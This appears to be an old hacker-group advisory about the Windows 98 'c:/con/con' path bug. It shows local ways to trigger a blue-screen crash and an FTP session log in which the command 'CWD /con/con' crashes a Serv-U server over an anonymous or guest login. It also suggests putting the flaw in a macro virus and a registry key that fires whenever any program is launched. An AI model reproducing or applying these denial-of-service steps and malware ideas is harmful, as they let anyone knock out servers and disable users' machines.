New exploit found by the securax crew on 3/3/error for: windoze 98 maybe 95 too... not for NT4 or win2K When we looked at the new exploit for ie that uses the image c:/con/con (http://www.zoomnet.net/~quick/error/crash.html) we experimented a bit with that unexisting path. We found that any program in windows 98 will crash if you try to open that file. eg: try Start --> run --> c:/con/con or open in Word the non-existing document c:/con/con both attempts will result in en Blues Screen of death and a lockup. This can also be exploited to crash remote servers Look what we tryed on this servU-FTP v 2.4a (works on any windoze 98 FTP even with anonyous or guest account) it looked something like this: 230 user logged in, proceed SYST 215 UNIX TYPE:L8 connect ok! PWD 257 "c:/home" is current directory. haal directory op TYPE A 200 Type set to A. PORT xx.xx.xx.xx :-) 200 PORT Command succesful LIST 150 Opening ASCII mode data connect Download: 86 bytes Wacht op de server 226 transfer complete CDUP 250 directory changed to /c:/ PWD 250 "/c:/" is current directory CWD /con/con --> this does the trick ... no more response :-) server crashed. This is probably just the beginning of a new series of exploits for windoze. this little flaw could easily be used in a macro virus. maybe even be placed in the registry HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open c:\con\con "%1" %* Da G#Df@RTER & Pathos (securax) www.securax.org